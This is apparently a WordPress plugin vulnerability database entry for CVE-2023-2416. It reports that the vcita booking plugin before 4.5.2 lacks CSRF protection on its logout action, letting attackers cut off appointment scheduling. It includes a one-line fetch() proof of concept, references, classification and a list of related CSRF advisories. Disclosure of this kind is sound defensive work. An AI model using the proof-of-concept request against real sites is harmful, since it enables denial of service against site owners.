Online Booking & Scheduling Calendar for WordPress by vcita < 4.5.2 – Denial of Service via CSRF | CVE 2023-2416 | Plugin Vulnerabilities

Description

The plugin does not protect its vcita_logout ajax action against CSRF attacks, allowing an unauthenticated attacker to log the site out from it's vcita account by tricking a logged in user to send a crafted request, causing a denial of service for the appointment scheduling functionality.

Proof of Concept

fetch(“/wp-admin/admin-ajax.php?action=vcita_logout”, {
     method: “POST”,
     headers: {
       Accept: “*/*”,
       “Content-Type”: “application/json”,
     },
   });

Affects Plugins

meeting-scheduler-by-vcita

Fixed in 4.5.2

References

CVE

URL

https://blog.jonh.eu/blog/security-vulnerabilities-in-wordpress-plugins-by-vcita

URL

https://www.wordfence.com/threat-intel/vulnerabilities/id/f434585c-8533-4788-b0bc-5650390c29a8

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Jonas Höbenreich

Verified

No

WPVDB ID

65375477-7bdf-4043-923a-25fbe02f7684

Timeline

Publicly Published

2023-06-02 (about 2 years ago)

Added

2023-06-03 (about 2 years ago)

Last Updated

2025-01-09 (about 1 year ago)

Other

Published

Title

Published

2024-04-22

Title

WPCal.io – Easy Meeting Scheduler < 0.9.5.9 - Cross-Site Request Forgery

Published

2023-11-27

Title

teachPress < 9.0.5 - Cross-Site Request Forgery

Published

2023-01-05

Title

Social Warfare < 4.4.0 - Post Meta Deletion via CSRF

Published

2025-05-29

Title

Simple Page Access Restriction < 1.0.32 - Cross-Site Request Forgery via Multiple Parameters

Published

2021-05-08

Title

Zlick Paywall < 2.2.2 - CSRF Bypasses